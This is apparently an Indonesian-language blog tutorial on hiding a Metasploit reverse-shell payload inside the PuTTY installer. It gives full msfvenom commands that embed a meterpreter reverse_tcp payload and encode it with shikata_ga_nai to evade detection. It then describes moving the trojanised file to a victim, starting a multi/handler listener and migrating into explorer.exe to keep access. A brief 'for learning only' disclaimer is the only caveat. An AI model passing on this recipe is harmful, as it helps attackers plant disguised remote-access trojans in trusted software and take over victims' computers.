Backdooring File EXE menggunakan msfvenom


PERINGANTAN Ini Hanya Untuk Pembelajaran Semata Jangan Di Salah Gunakan pada Tindakan Kejahatan 
Oke langsung ke pembahasan jadi msfvenom ini menyediakan fitur encoder shikata_ga_nai yang nantinya menyamarkan/menyisipkan si payload ke installer exe tersebut.. Membuat executable backdoored yang disesuaikan sering membutuhkan waktu lama untuk dilakukan secara manual sebagai penyerang. jadi hal pertama yang dilakukan ialah kita download mentahannya, disini saya menggunakan putty client langsung saja bisa download ketik di terminal wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
Sekarang Saatnya menyamarkan backdoor ke file installer tersebut dengan perintah msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.43.140 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyXploit.exe

Keterangan :
- a adalah architecture yang digunakan
--platform adalah platform payload yang di buat
-x posisi atau letak file exe yang hendak di injeksi
-k perintah untuk mertahankan perilaku template(file.exe) dan menyuntikkan payload sebagai thread      baru
-p perintah untuk menentukan tipe payload
    windows/meterpreter/reverse_tcp adalah tipe payload yang digunakan
-lhost adalah alamat IP kita
-lport adalah yang akan kita gunakan dalam menjalankan listener ( reverse )
-e untuk memilih encoder yang digunakan x86/shikata_ga_nai adalah encoder yang digunakan
-i iterations (jumlah encode payload)
-f format output
-o output hasil file yang telah di injeksi ( backdoor result )
Sekarang kita sudah pindahkan hasil backdooring file exe nya ke si target, sekarang kita tunggu si korban menjalankan puttynya
Sambil Menunggu Kita membuat listenernya terlebih dahulu dengan perintah msfconsole masukkan perintah use /exploit/multi/handler dan set payload ke reverse_tcp menyesuaikan yang ditentukan di pembuatan backdoor tadi set payload windows/metepreter/reverse_tcp lalu tentukan lhost yang sudah ditentukan di backdoor/payload ialah ip address kita set lhost 192.168.43.140 lalu tentukan portnya pula yang sudah ditentukan di payload set lport 8080 dan exploit tunggu hingga korban menjalan file puttynya  
Jika sudah tereksplotasi atau sudah memasuki sesi meterpreter saatnya migrate jadi Meterpreter session akan closed, ketika target menutup file Installer tersebut, untuk itu segera pindah ke prosses yang lain agar kita tetap mendapat sesi meterpreter, gunakan perintah migrate sebelumnya untuk melihat list proses gunakan perintah ps disini saya akan memindahkan prosesnya ke file exploler dengan PID 1468 maka masukkan perintah migrate 1468
Ya sekian dari saya semoga bermanfaat.. sekali lagi ini hanya untuk pembelajaran
Click here to Download